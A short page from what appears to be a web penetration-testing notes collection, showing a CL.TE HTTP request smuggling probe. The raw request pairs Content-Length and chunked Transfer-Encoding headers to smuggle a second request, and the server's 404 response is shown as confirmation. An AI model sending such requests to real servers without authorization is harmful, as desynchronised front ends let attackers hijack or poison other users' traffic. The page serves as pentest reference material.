HTTP request smuggling

CL.TE

# Request
POST / HTTP/1.1
Host: <URL>
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: X

# First response is 200 OK, second response is 404 not found
HTTP/1.1 404 Not Found
Content-Type: application/json; charset=utf-8
Set-Cookie: session=u4M8Wwqi6bcEnxqXxAbflroUoqbw3yX0; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 11

"Not Found"

PreviousWeb Stuff NextFile uploads

Last updated 9 months ago